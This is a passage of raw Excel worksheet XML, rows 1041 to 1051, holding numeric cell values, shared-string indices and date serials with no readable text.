      <c r="A1041">
        <v>5067</v>
      </c>
      <c r="B1041" t="s">
        <v>3700</v>
      </c>
      <c r="C1041" t="s">
        <v>189</v>
      </c>
      <c r="D1041" t="s">
        <v>7907</v>
      </c>
      <c r="E1041" t="s">
        <v>843</v>
      </c>
      <c r="F1041" t="s">
        <v>4686</v>
      </c>
      <c r="G1041" s="1">
        <v>44131</v>
      </c>
      <c r="H1041">
        <v>7093</v>
      </c>
      <c r="I1041">
        <v>7093</v>
      </c>
      <c r="J1041">
        <v>0</v>
      </c>
      <c r="K1041">
        <v>0</v>
      </c>
      <c r="L1041">
        <v>0</v>
      </c>
      <c r="M1041">
        <v>0</v>
      </c>
      <c r="N1041">
        <v>0</v>
      </c>
      <c r="O1041">
        <v>0</v>
      </c>
      <c r="P1041">
        <v>0</v>
      </c>
      <c r="Q1041">
        <v>3</v>
      </c>
      <c r="R1041">
        <v>3</v>
      </c>
      <c r="S1041">
        <v>0</v>
      </c>
      <c r="T1041">
        <v>1</v>
      </c>
      <c r="U1041">
        <v>0</v>
      </c>
      <c r="V1041">
        <v>0</v>
      </c>
      <c r="W1041">
        <v>0</v>
      </c>
      <c r="X1041">
        <v>0</v>
      </c>
      <c r="Y1041">
        <v>0</v>
      </c>
      <c r="Z1041">
        <v>0</v>
      </c>
      <c r="AA1041">
        <v>0</v>
      </c>
      <c r="AB1041">
        <v>5000</v>
      </c>
      <c r="AC1041">
        <v>5000</v>
      </c>
      <c r="AD1041">
        <v>0</v>
      </c>
      <c r="AE1041">
        <v>1000</v>
      </c>
      <c r="AF1041" t="s">
        <v>3703</v>
      </c>
      <c r="AG1041">
        <v>97235</v>
      </c>
      <c r="AH1041">
        <v>31</v>
      </c>
      <c r="AJ1041">
        <v>461</v>
      </c>
      <c r="AK1041" t="s">
        <v>1099</v>
      </c>
      <c r="AL1041" t="s">
        <v>1100</v>
      </c>
      <c r="AM1041" t="s">
        <v>7908</v>
      </c>
      <c r="AN1041" t="s">
        <v>55</v>
      </c>
      <c r="AO1041">
        <v>2016</v>
      </c>
      <c r="AP1041" t="s">
        <v>3706</v>
      </c>
      <c r="AQ1041" t="s">
        <v>7909</v>
      </c>
      <c r="AR1041" t="s">
        <v>3707</v>
      </c>
      <c r="AS1041" t="s">
        <v>71</v>
      </c>
      <c r="AT1041" t="s">
        <v>58</v>
      </c>
      <c r="AU1041">
        <v>26</v>
      </c>
      <c r="AV1041">
        <v>1</v>
      </c>
      <c r="AW1041">
        <v>0</v>
      </c>
      <c r="AX1041">
        <v>0</v>
      </c>
      <c r="AY1041">
        <v>17</v>
      </c>
      <c r="AZ1041">
        <v>4</v>
      </c>
      <c r="BA1041" t="s">
        <v>16954</v>
      </c>
      <c r="BB1041">
        <v>0</v>
      </c>
      <c r="BC1041">
        <v>0</v>
      </c>
      <c r="BD1041" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1042" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1042">
        <v>5003</v>
      </c>
      <c r="B1042" t="s">
        <v>7910</v>
      </c>
      <c r="C1042" t="s">
        <v>199</v>
      </c>
      <c r="D1042" t="s">
        <v>7911</v>
      </c>
      <c r="E1042" t="s">
        <v>111</v>
      </c>
      <c r="F1042" t="s">
        <v>7912</v>
      </c>
      <c r="G1042" s="1">
        <v>44186</v>
      </c>
      <c r="H1042">
        <v>7107</v>
      </c>
      <c r="I1042">
        <v>7107</v>
      </c>
      <c r="J1042">
        <v>0</v>
      </c>
      <c r="K1042">
        <v>0</v>
      </c>
      <c r="L1042">
        <v>0</v>
      </c>
      <c r="M1042">
        <v>0</v>
      </c>
      <c r="N1042">
        <v>0</v>
      </c>
      <c r="O1042">
        <v>0</v>
      </c>
      <c r="P1042">
        <v>0</v>
      </c>
      <c r="Q1042">
        <v>2</v>
      </c>
      <c r="R1042">
        <v>1</v>
      </c>
      <c r="S1042">
        <v>0</v>
      </c>
      <c r="T1042">
        <v>0</v>
      </c>
      <c r="U1042">
        <v>0</v>
      </c>
      <c r="V1042">
        <v>0</v>
      </c>
      <c r="W1042">
        <v>0</v>
      </c>
      <c r="X1042">
        <v>0</v>
      </c>
      <c r="Y1042">
        <v>0</v>
      </c>
      <c r="Z1042">
        <v>0</v>
      </c>
      <c r="AA1042">
        <v>0</v>
      </c>
      <c r="AB1042">
        <v>1000</v>
      </c>
      <c r="AC1042">
        <v>1000</v>
      </c>
      <c r="AD1042">
        <v>0</v>
      </c>
      <c r="AE1042">
        <v>0</v>
      </c>
      <c r="AF1042" t="s">
        <v>7913</v>
      </c>
      <c r="AG1042">
        <v>24415</v>
      </c>
      <c r="AH1042">
        <v>1</v>
      </c>
      <c r="AJ1042">
        <v>21</v>
      </c>
      <c r="AK1042" t="s">
        <v>7914</v>
      </c>
      <c r="AL1042" t="s">
        <v>7915</v>
      </c>
      <c r="AM1042" t="s">
        <v>3365</v>
      </c>
      <c r="AN1042" t="s">
        <v>68</v>
      </c>
      <c r="AO1042">
        <v>2019</v>
      </c>
      <c r="AP1042">
        <v>81376305588</v>
      </c>
      <c r="AQ1042" t="s">
        <v>7916</v>
      </c>
      <c r="AR1042" t="s">
        <v>7913</v>
      </c>
      <c r="AS1042" t="s">
        <v>71</v>
      </c>
      <c r="AT1042" t="s">
        <v>72</v>
      </c>
      <c r="AU1042">
        <v>25</v>
      </c>
      <c r="AV1042">
        <v>1</v>
      </c>
      <c r="AW1042">
        <v>3</v>
      </c>
      <c r="AX1042">
        <v>2</v>
      </c>
      <c r="AY1042">
        <v>3</v>
      </c>
      <c r="AZ1042">
        <v>3</v>
      </c>
      <c r="BA1042" t="s">
        <v>17533</v>
      </c>
      <c r="BB1042">
        <v>0</v>
      </c>
      <c r="BC1042">
        <v>0</v>
      </c>
      <c r="BD1042" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1043" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1043">
        <v>2746</v>
      </c>
      <c r="B1043" t="s">
        <v>7917</v>
      </c>
      <c r="C1043" t="s">
        <v>3013</v>
      </c>
      <c r="D1043" t="s">
        <v>7918</v>
      </c>
      <c r="E1043" t="s">
        <v>843</v>
      </c>
      <c r="F1043" t="s">
        <v>3828</v>
      </c>
      <c r="G1043" s="1">
        <v>44187</v>
      </c>
      <c r="H1043">
        <v>7131</v>
      </c>
      <c r="I1043">
        <v>7131</v>
      </c>
      <c r="J1043">
        <v>0</v>
      </c>
      <c r="K1043">
        <v>1</v>
      </c>
      <c r="L1043">
        <v>0</v>
      </c>
      <c r="M1043">
        <v>0</v>
      </c>
      <c r="N1043">
        <v>0</v>
      </c>
      <c r="O1043">
        <v>0</v>
      </c>
      <c r="P1043">
        <v>0</v>
      </c>
      <c r="Q1043">
        <v>2</v>
      </c>
      <c r="R1043">
        <v>1</v>
      </c>
      <c r="S1043">
        <v>0</v>
      </c>
      <c r="T1043">
        <v>0</v>
      </c>
      <c r="U1043">
        <v>0</v>
      </c>
      <c r="V1043">
        <v>1000</v>
      </c>
      <c r="W1043">
        <v>0</v>
      </c>
      <c r="X1043">
        <v>0</v>
      </c>
      <c r="Y1043">
        <v>0</v>
      </c>
      <c r="Z1043">
        <v>0</v>
      </c>
      <c r="AA1043">
        <v>0</v>
      </c>
      <c r="AB1043">
        <v>100</v>
      </c>
      <c r="AC1043">
        <v>100</v>
      </c>
      <c r="AD1043">
        <v>0</v>
      </c>
      <c r="AE1043">
        <v>0</v>
      </c>
      <c r="AF1043" t="s">
        <v>7919</v>
      </c>
      <c r="AG1043">
        <v>28912</v>
      </c>
      <c r="AH1043">
        <v>4</v>
      </c>
      <c r="AJ1043">
        <v>84</v>
      </c>
      <c r="AK1043" t="s">
        <v>7920</v>
      </c>
      <c r="AL1043" t="s">
        <v>7921</v>
      </c>
      <c r="AM1043" t="s">
        <v>7922</v>
      </c>
      <c r="AN1043" t="s">
        <v>68</v>
      </c>
      <c r="AO1043">
        <v>2017</v>
      </c>
      <c r="AP1043">
        <v>82166061972</v>
      </c>
      <c r="AQ1043" t="s">
        <v>7923</v>
      </c>
      <c r="AR1043" t="s">
        <v>7919</v>
      </c>
      <c r="AS1043" t="s">
        <v>71</v>
      </c>
      <c r="AT1043" t="s">
        <v>72</v>
      </c>
      <c r="AU1043">
        <v>24</v>
      </c>
      <c r="AV1043">
        <v>1</v>
      </c>
      <c r="AW1043">
        <v>12</v>
      </c>
      <c r="AX1043">
        <v>0</v>
      </c>
      <c r="AY1043">
        <v>12</v>
      </c>
      <c r="AZ1043">
        <v>0</v>
      </c>
      <c r="BA1043" t="s">
        <v>17305</v>
      </c>
      <c r="BB1043" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1043">
        <v>0</v>
      </c>
      <c r="BD1043" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="1044" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1044">
        <v>5088</v>
      </c>
      <c r="B1044" t="s">
        <v>7924</v>
      </c>
      <c r="C1044" t="s">
        <v>458</v>
      </c>
      <c r="D1044" t="s">
        <v>7925</v>
      </c>
      <c r="E1044" t="s">
        <v>843</v>
      </c>
      <c r="F1044" t="s">
        <v>6417</v>
      </c>
      <c r="G1044" s="1">
        <v>44155</v>
      </c>
      <c r="H1044">
        <v>7138</v>
      </c>
      <c r="I1044">
        <v>7138</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t="s">
        <v>7924</v>
      </c>
      <c r="AG1044">
        <v>29661</v>
      </c>
      <c r="AH1044">
        <v>5</v>
      </c>
      <c r="AJ1044">
        <v>148</v>
      </c>
      <c r="AK1044" t="s">
        <v>4474</v>
      </c>
      <c r="AL1044" t="s">
        <v>7926</v>
      </c>
      <c r="AM1044" t="s">
        <v>7927</v>
      </c>
      <c r="AN1044" t="s">
        <v>68</v>
      </c>
      <c r="AO1044">
        <v>2015</v>
      </c>
      <c r="AP1044" t="s">
        <v>623</v>
      </c>
      <c r="AQ1044" t="s">
        <v>7928</v>
      </c>
      <c r="AR1044" t="s">
        <v>7924</v>
      </c>
      <c r="AS1044" t="s">
        <v>71</v>
      </c>
      <c r="AT1044" t="s">
        <v>72</v>
      </c>
      <c r="AU1044">
        <v>15</v>
      </c>
      <c r="AV1044">
        <v>1</v>
      </c>
      <c r="AW1044">
        <v>0</v>
      </c>
      <c r="AX1044">
        <v>0</v>
      </c>
      <c r="AY1044">
        <v>4</v>
      </c>
      <c r="AZ1044">
        <v>0</v>
      </c>
      <c r="BA1044" t="s">
        <v>17574</v>
      </c>
      <c r="BB1044" t="s">
        <v>16085</v>
      </c>
      <c r="BC1044" t="s">
        <v>12440</v>
      </c>
      <c r="BD1044" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="1045" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1045">
        <v>5087</v>
      </c>
      <c r="B1045" t="s">
        <v>7929</v>
      </c>
      <c r="C1045" t="s">
        <v>458</v>
      </c>
      <c r="D1045" t="s">
        <v>7930</v>
      </c>
      <c r="E1045" t="s">
        <v>843</v>
      </c>
      <c r="F1045" t="s">
        <v>6417</v>
      </c>
      <c r="G1045" s="1">
        <v>44148</v>
      </c>
      <c r="H1045">
        <v>7145</v>
      </c>
      <c r="I1045">
        <v>7145</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t="s">
        <v>7931</v>
      </c>
      <c r="AG1045">
        <v>29661</v>
      </c>
      <c r="AH1045">
        <v>5</v>
      </c>
      <c r="AJ1045">
        <v>148</v>
      </c>
      <c r="AK1045" t="s">
        <v>4474</v>
      </c>
      <c r="AL1045" t="s">
        <v>4492</v>
      </c>
      <c r="AM1045" t="s">
        <v>7932</v>
      </c>
      <c r="AN1045" t="s">
        <v>68</v>
      </c>
      <c r="AO1045">
        <v>2013</v>
      </c>
      <c r="AP1045" t="s">
        <v>623</v>
      </c>
      <c r="AQ1045" t="s">
        <v>7933</v>
      </c>
      <c r="AR1045" t="s">
        <v>7934</v>
      </c>
      <c r="AS1045" t="s">
        <v>71</v>
      </c>
      <c r="AT1045" t="s">
        <v>72</v>
      </c>
      <c r="AU1045">
        <v>15</v>
      </c>
      <c r="AV1045">
        <v>1</v>
      </c>
      <c r="AW1045">
        <v>0</v>
      </c>
      <c r="AX1045">
        <v>0</v>
      </c>
      <c r="AY1045">
        <v>4</v>
      </c>
      <c r="AZ1045">
        <v>0</v>
      </c>
      <c r="BA1045" t="s">
        <v>17573</v>
      </c>
      <c r="BB1045">
        <v>0</v>
      </c>
      <c r="BC1045" t="s">
        <v>12440</v>
      </c>
      <c r="BD1045" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="1046" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1046">
        <v>5096</v>
      </c>
      <c r="B1046" t="s">
        <v>7935</v>
      </c>
      <c r="C1046" t="s">
        <v>477</v>
      </c>
      <c r="D1046" t="s">
        <v>7936</v>
      </c>
      <c r="E1046" t="s">
        <v>843</v>
      </c>
      <c r="F1046" t="s">
        <v>4686</v>
      </c>
      <c r="G1046" s="1">
        <v>44145</v>
      </c>
      <c r="H1046">
        <v>7152</v>
      </c>
      <c r="I1046">
        <v>7152</v>
      </c>
      <c r="J1046">
        <v>0</v>
      </c>
      <c r="K1046">
        <v>1</v>
      </c>
      <c r="L1046">
        <v>0</v>
      </c>
      <c r="M1046">
        <v>0</v>
      </c>
      <c r="N1046">
        <v>0</v>
      </c>
      <c r="O1046">
        <v>0</v>
      </c>
      <c r="P1046">
        <v>0</v>
      </c>
      <c r="Q1046">
        <v>0</v>
      </c>
      <c r="R1046">
        <v>2</v>
      </c>
      <c r="S1046">
        <v>0</v>
      </c>
      <c r="T1046">
        <v>1</v>
      </c>
      <c r="U1046">
        <v>0</v>
      </c>
      <c r="V1046">
        <v>5000</v>
      </c>
      <c r="W1046">
        <v>0</v>
      </c>
      <c r="X1046">
        <v>0</v>
      </c>
      <c r="Y1046">
        <v>0</v>
      </c>
      <c r="Z1046">
        <v>0</v>
      </c>
      <c r="AA1046">
        <v>0</v>
      </c>
      <c r="AB1046">
        <v>0</v>
      </c>
      <c r="AC1046">
        <v>2000</v>
      </c>
      <c r="AD1046">
        <v>0</v>
      </c>
      <c r="AE1046">
        <v>5000</v>
      </c>
      <c r="AF1046" t="s">
        <v>7937</v>
      </c>
      <c r="AG1046">
        <v>95373</v>
      </c>
      <c r="AH1046">
        <v>29</v>
      </c>
      <c r="AJ1046">
        <v>376</v>
      </c>
      <c r="AK1046" t="s">
        <v>7938</v>
      </c>
      <c r="AL1046" t="s">
        <v>2078</v>
      </c>
      <c r="AM1046" t="s">
        <v>7939</v>
      </c>
      <c r="AN1046" t="s">
        <v>55</v>
      </c>
      <c r="AO1046">
        <v>2011</v>
      </c>
      <c r="AP1046">
        <v>8114342623</v>
      </c>
      <c r="AQ1046" t="s">
        <v>7940</v>
      </c>
      <c r="AR1046" t="s">
        <v>7941</v>
      </c>
      <c r="AS1046" t="s">
        <v>71</v>
      </c>
      <c r="AT1046" t="s">
        <v>58</v>
      </c>
      <c r="AU1046">
        <v>26</v>
      </c>
      <c r="AV1046">
        <v>1</v>
      </c>
      <c r="AW1046">
        <v>0</v>
      </c>
      <c r="AX1046">
        <v>0</v>
      </c>
      <c r="AY1046">
        <v>7</v>
      </c>
      <c r="AZ1046">
        <v>2</v>
      </c>
      <c r="BA1046" t="s">
        <v>17579</v>
      </c>
      <c r="BB1046">
        <v>0</v>
      </c>
      <c r="BC1046">
        <v>0</v>
      </c>
      <c r="BD1046" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1047" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1047">
        <v>5066</v>
      </c>
      <c r="B1047" t="s">
        <v>7942</v>
      </c>
      <c r="C1047" t="s">
        <v>99</v>
      </c>
      <c r="D1047" t="s">
        <v>7943</v>
      </c>
      <c r="E1047" t="s">
        <v>142</v>
      </c>
      <c r="F1047" t="s">
        <v>7944</v>
      </c>
      <c r="G1047" s="1">
        <v>44200</v>
      </c>
      <c r="H1047">
        <v>7163</v>
      </c>
      <c r="I1047">
        <v>7163</v>
      </c>
      <c r="J1047">
        <v>1</v>
      </c>
      <c r="K1047">
        <v>0</v>
      </c>
      <c r="L1047">
        <v>0</v>
      </c>
      <c r="M1047">
        <v>0</v>
      </c>
      <c r="N1047">
        <v>0</v>
      </c>
      <c r="O1047">
        <v>0</v>
      </c>
      <c r="P1047">
        <v>0</v>
      </c>
      <c r="Q1047">
        <v>0</v>
      </c>
      <c r="R1047">
        <v>0</v>
      </c>
      <c r="S1047">
        <v>0</v>
      </c>
      <c r="T1047">
        <v>1</v>
      </c>
      <c r="U1047">
        <v>300000</v>
      </c>
      <c r="V1047">
        <v>0</v>
      </c>
      <c r="W1047">
        <v>0</v>
      </c>
      <c r="X1047">
        <v>0</v>
      </c>
      <c r="Y1047">
        <v>0</v>
      </c>
      <c r="Z1047">
        <v>0</v>
      </c>
      <c r="AA1047">
        <v>0</v>
      </c>
      <c r="AB1047">
        <v>0</v>
      </c>
      <c r="AC1047">
        <v>0</v>
      </c>
      <c r="AD1047">
        <v>0</v>
      </c>
      <c r="AE1047">
        <v>5000</v>
      </c>
      <c r="AF1047" t="s">
        <v>7945</v>
      </c>
      <c r="AG1047">
        <v>14440</v>
      </c>
      <c r="AH1047">
        <v>12</v>
      </c>
      <c r="AJ1047">
        <v>160</v>
      </c>
      <c r="AK1047" t="s">
        <v>114</v>
      </c>
      <c r="AL1047" t="s">
        <v>114</v>
      </c>
      <c r="AM1047" t="s">
        <v>7946</v>
      </c>
      <c r="AN1047" t="s">
        <v>55</v>
      </c>
      <c r="AO1047">
        <v>2020</v>
      </c>
      <c r="AP1047">
        <v>81260979544</v>
      </c>
      <c r="AQ1047" t="s">
        <v>7947</v>
      </c>
      <c r="AR1047" t="s">
        <v>7945</v>
      </c>
      <c r="AS1047" t="s">
        <v>187</v>
      </c>
      <c r="AT1047" t="s">
        <v>58</v>
      </c>
      <c r="AU1047">
        <v>26</v>
      </c>
      <c r="AV1047">
        <v>0</v>
      </c>
      <c r="AW1047">
        <v>8</v>
      </c>
      <c r="AX1047">
        <v>0</v>
      </c>
      <c r="AY1047">
        <v>2</v>
      </c>
      <c r="AZ1047">
        <v>0</v>
      </c>
      <c r="BA1047" t="s">
        <v>17564</v>
      </c>
      <c r="BB1047">
        <v>0</v>
      </c>
      <c r="BC1047">
        <v>0</v>
      </c>
      <c r="BD1047" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="1048" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1048">
        <v>5101</v>
      </c>
      <c r="B1048" t="s">
        <v>7948</v>
      </c>
      <c r="C1048" t="s">
        <v>157</v>
      </c>
      <c r="D1048" t="s">
        <v>7949</v>
      </c>
      <c r="E1048" t="s">
        <v>142</v>
      </c>
      <c r="F1048" t="s">
        <v>7950</v>
      </c>
      <c r="G1048" s="1">
        <v>44281</v>
      </c>
      <c r="H1048">
        <v>7177</v>
      </c>
      <c r="I1048">
        <v>7177</v>
      </c>
      <c r="J1048">
        <v>3</v>
      </c>
      <c r="K1048">
        <v>0</v>
      </c>
      <c r="L1048">
        <v>0</v>
      </c>
      <c r="M1048">
        <v>0</v>
      </c>
      <c r="N1048">
        <v>0</v>
      </c>
      <c r="O1048">
        <v>0</v>
      </c>
      <c r="P1048">
        <v>0</v>
      </c>
      <c r="Q1048">
        <v>0</v>
      </c>
      <c r="R1048">
        <v>0</v>
      </c>
      <c r="S1048">
        <v>0</v>
      </c>
      <c r="T1048">
        <v>0</v>
      </c>
      <c r="U1048">
        <v>300</v>
      </c>
      <c r="V1048">
        <v>0</v>
      </c>
      <c r="W1048">
        <v>0</v>
      </c>
      <c r="X1048">
        <v>0</v>
      </c>
      <c r="Y1048">
        <v>0</v>
      </c>
      <c r="Z1048">
        <v>0</v>
      </c>
      <c r="AA1048">
        <v>0</v>
      </c>
      <c r="AB1048">
        <v>0</v>
      </c>
      <c r="AC1048">
        <v>0</v>
      </c>
      <c r="AD1048">
        <v>0</v>
      </c>
      <c r="AE1048">
        <v>0</v>
      </c>
      <c r="AF1048" t="s">
        <v>7951</v>
      </c>
      <c r="AG1048">
        <v>67156</v>
      </c>
      <c r="AH1048">
        <v>16</v>
      </c>
      <c r="AJ1048">
        <v>241</v>
      </c>
      <c r="AK1048" t="s">
        <v>947</v>
      </c>
      <c r="AL1048" t="s">
        <v>7952</v>
      </c>
      <c r="AM1048" t="s">
        <v>7953</v>
      </c>
      <c r="AN1048" t="s">
        <v>68</v>
      </c>
      <c r="AO1048">
        <v>2015</v>
      </c>
      <c r="AP1048" t="s">
        <v>7954</v>
      </c>
      <c r="AQ1048" t="s">
        <v>7955</v>
      </c>
      <c r="AR1048" t="s">
        <v>7951</v>
      </c>
      <c r="AS1048" t="s">
        <v>71</v>
      </c>
      <c r="AT1048" t="s">
        <v>72</v>
      </c>
      <c r="AU1048">
        <v>25</v>
      </c>
      <c r="AV1048">
        <v>1</v>
      </c>
      <c r="AW1048">
        <v>0</v>
      </c>
      <c r="AX1048">
        <v>3</v>
      </c>
      <c r="AY1048">
        <v>3</v>
      </c>
      <c r="AZ1048">
        <v>1</v>
      </c>
      <c r="BA1048" t="s">
        <v>17582</v>
      </c>
      <c r="BB1048">
        <v>0</v>
      </c>
      <c r="BC1048" t="s">
        <v>12426</v>
      </c>
      <c r="BD1048">
        <v>0</v>
      </c>
    </row>
    <row r="1049" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1049">
        <v>5075</v>
      </c>
      <c r="B1049" t="s">
        <v>7956</v>
      </c>
      <c r="C1049" t="s">
        <v>318</v>
      </c>
      <c r="D1049" t="s">
        <v>7957</v>
      </c>
      <c r="E1049" t="s">
        <v>363</v>
      </c>
      <c r="F1049" t="s">
        <v>364</v>
      </c>
      <c r="G1049" s="1">
        <v>44168</v>
      </c>
      <c r="H1049">
        <v>7185</v>
      </c>
      <c r="I1049">
        <v>7185</v>
      </c>
      <c r="J1049">
        <v>0</v>
      </c>
      <c r="K1049">
        <v>0</v>
      </c>
      <c r="L1049">
        <v>0</v>
      </c>
      <c r="M1049">
        <v>0</v>
      </c>
      <c r="N1049">
        <v>0</v>
      </c>
      <c r="O1049">
        <v>0</v>
      </c>
      <c r="P1049">
        <v>0</v>
      </c>
      <c r="Q1049">
        <v>0</v>
      </c>
      <c r="R1049">
        <v>0</v>
      </c>
      <c r="S1049">
        <v>0</v>
      </c>
      <c r="T1049">
        <v>1</v>
      </c>
      <c r="U1049">
        <v>0</v>
      </c>
      <c r="V1049">
        <v>0</v>
      </c>
      <c r="W1049">
        <v>0</v>
      </c>
      <c r="X1049">
        <v>0</v>
      </c>
      <c r="Y1049">
        <v>0</v>
      </c>
      <c r="Z1049">
        <v>0</v>
      </c>
      <c r="AA1049">
        <v>0</v>
      </c>
      <c r="AB1049">
        <v>0</v>
      </c>
      <c r="AC1049">
        <v>0</v>
      </c>
      <c r="AD1049">
        <v>0</v>
      </c>
      <c r="AE1049">
        <v>50000</v>
      </c>
      <c r="AF1049" t="s">
        <v>7958</v>
      </c>
      <c r="AG1049">
        <v>92754</v>
      </c>
      <c r="AH1049">
        <v>26</v>
      </c>
      <c r="AJ1049">
        <v>409</v>
      </c>
      <c r="AK1049" t="s">
        <v>7959</v>
      </c>
      <c r="AL1049" t="s">
        <v>7959</v>
      </c>
      <c r="AM1049" t="s">
        <v>7960</v>
      </c>
      <c r="AN1049" t="s">
        <v>55</v>
      </c>
      <c r="AO1049">
        <v>2015</v>
      </c>
      <c r="AP1049">
        <v>85255699696</v>
      </c>
      <c r="AQ1049" t="s">
        <v>7961</v>
      </c>
      <c r="AR1049" t="s">
        <v>7962</v>
      </c>
      <c r="AS1049" t="s">
        <v>371</v>
      </c>
      <c r="AT1049" t="s">
        <v>58</v>
      </c>
      <c r="AU1049">
        <v>0</v>
      </c>
      <c r="AV1049">
        <v>0</v>
      </c>
      <c r="AW1049">
        <v>0</v>
      </c>
      <c r="AX1049">
        <v>6</v>
      </c>
      <c r="AY1049">
        <v>2</v>
      </c>
      <c r="AZ1049">
        <v>2</v>
      </c>
      <c r="BA1049" t="s">
        <v>17567</v>
      </c>
      <c r="BB1049" t="s">
        <v>16089</v>
      </c>
      <c r="BC1049" t="s">
        <v>12560</v>
      </c>
      <c r="BD1049" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="1050" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1050">
        <v>4923</v>
      </c>
      <c r="B1050" t="s">
        <v>7963</v>
      </c>
      <c r="C1050" t="s">
        <v>2308</v>
      </c>
      <c r="D1050" t="s">
        <v>7964</v>
      </c>
      <c r="E1050" t="s">
        <v>363</v>
      </c>
      <c r="F1050" t="s">
        <v>7965</v>
      </c>
      <c r="G1050" s="1">
        <v>44147</v>
      </c>
      <c r="H1050">
        <v>7188</v>
      </c>
      <c r="I1050">
        <v>7188</v>
      </c>
      <c r="J1050">
        <v>0</v>
      </c>
      <c r="K1050">
        <v>0</v>
      </c>
      <c r="L1050">
        <v>0</v>
      </c>
      <c r="M1050">
        <v>0</v>
      </c>
      <c r="N1050">
        <v>0</v>
      </c>
      <c r="O1050">
        <v>0</v>
      </c>
      <c r="P1050">
        <v>0</v>
      </c>
      <c r="Q1050">
        <v>0</v>
      </c>
      <c r="R1050">
        <v>10</v>
      </c>
      <c r="S1050">
        <v>0</v>
      </c>
      <c r="T1050">
        <v>1</v>
      </c>
      <c r="U1050">
        <v>0</v>
      </c>
      <c r="V1050">
        <v>0</v>
      </c>
      <c r="W1050">
        <v>0</v>
      </c>
      <c r="X1050">
        <v>0</v>
      </c>
      <c r="Y1050">
        <v>0</v>
      </c>
      <c r="Z1050">
        <v>0</v>
      </c>
      <c r="AA1050">
        <v>0</v>
      </c>
      <c r="AB1050">
        <v>0</v>
      </c>
      <c r="AC1050">
        <v>500</v>
      </c>
      <c r="AD1050">
        <v>0</v>
      </c>
      <c r="AE1050">
        <v>5000</v>
      </c>
      <c r="AF1050" t="s">
        <v>7966</v>
      </c>
      <c r="AG1050">
        <v>98418</v>
      </c>
      <c r="AH1050">
        <v>33</v>
      </c>
      <c r="AJ1050">
        <v>485</v>
      </c>
      <c r="AK1050" t="s">
        <v>7868</v>
      </c>
      <c r="AL1050" t="s">
        <v>7967</v>
      </c>
      <c r="AM1050" t="s">
        <v>7968</v>
      </c>
      <c r="AN1050" t="s">
        <v>55</v>
      </c>
      <c r="AO1050">
        <v>2020</v>
      </c>
      <c r="AP1050">
        <v>82221749800</v>
      </c>
      <c r="AQ1050" t="s">
        <v>7969</v>
      </c>
      <c r="AR1050" t="s">
        <v>7966</v>
      </c>
      <c r="AS1050" t="s">
        <v>371</v>
      </c>
      <c r="AT1050" t="s">
        <v>72</v>
      </c>
      <c r="AU1050">
        <v>20</v>
      </c>
      <c r="AV1050">
        <v>1</v>
      </c>
      <c r="AW1050">
        <v>2</v>
      </c>
      <c r="AX1050">
        <v>0</v>
      </c>
      <c r="AY1050">
        <v>4</v>
      </c>
      <c r="AZ1050">
        <v>2</v>
      </c>
      <c r="BA1050" t="s">
        <v>17493</v>
      </c>
      <c r="BB1050" t="s">
        <v>17495</v>
      </c>
      <c r="BC1050" t="s">
        <v>12411</v>
      </c>
      <c r="BD1050" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="1051" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1051">
        <v>5083</v>
      </c>
      <c r="B1051" t="s">
        <v>7970</v>
      </c>
      <c r="C1051" t="s">
        <v>458</v>
      </c>
      <c r="D1051" t="s">
        <v>7971</v>
      </c>
      <c r="E1051" t="s">
        <v>142</v>
      </c>
      <c r="F1051" t="s">
        <v>143</v>
      </c>
      <c r="G1051" s="1">
        <v>44162</v>
      </c>
      <c r="H1051">
        <v>7197</v>
      </c>
      <c r="I1051">
        <v>7197</v>
      </c>
      <c r="J1051">
        <v>0</v>
      </c>
      <c r="K1051">
        <v>0</v>
      </c>
      <c r="L1051">
        <v>0</v>
      </c>
      <c r="M1051">
        <v>2</v>
      </c>
      <c r="N1051">
        <v>0</v>
      </c>
      <c r="O1051">
        <v>0</v>
      </c>
      <c r="P1051">
        <v>0</v>
      </c>
      <c r="Q1051">
        <v>0</v>
      </c>
      <c r="R1051">
        <v>0</v>
      </c>
      <c r="S1051">
        <v>0</v>
      </c>
      <c r="T1051">
        <v>0</v>
      </c>
      <c r="U1051">
        <v>0</v>
      </c>
      <c r="V1051">
        <v>0</v>
      </c>
      <c r="W1051">
        <v>0</v>
      </c>
      <c r="X1051">
        <v>250</v>
      </c>
      <c r="Y1051">
        <v>0</v>
      </c>
      <c r="Z1051">
        <v>0</v>
      </c>
      <c r="AA1051">
        <v>0</v>
      </c>
      <c r="AB1051">
        <v>0</v>
      </c>
      <c r="AC1051">
        <v>0</v>
      </c>
      <c r="AD1051">
        <v>0</v>
      </c>
      <c r="AE1051">
        <v>0</v>
      </c>
      <c r="AF1051" t="s">
        <v>7972</v>
      </c>
      <c r="AG1051">
        <v>29431</v>
      </c>
      <c r="AH1051">
        <v>5</v>
      </c>
      <c r="AJ1051">
        <v>153</v>
      </c>
      <c r="AK1051" t="s">
        <v>2427</v>
      </c>
      <c r="AL1051" t="s">
        <v>7973</v>
      </c>
      <c r="AM1051" t="s">
        <v>7974</v>
      </c>
      <c r="AN1051" t="s">
        <v>68</v>
      </c>
      <c r="AO1051">
        <v>2017</v>
      </c>
      <c r="AP1051">
        <v>85216173031</v>
      </c>
      <c r="AQ1051" t="s">
        <v>7975</v>
      </c>
      <c r="AR1051" t="s">
        <v>7972</v>
      </c>
      <c r="AS1051" t="s">
        <v>71</v>
      </c>
      <c r="AT1051" t="s">
        <v>72</v>
      </c>
      <c r="AU1051">
        <v>24</v>
      </c>
      <c r="AV1051">
        <v>1</v>
      </c>
      <c r="AW1051">
        <v>0</v>
      </c>
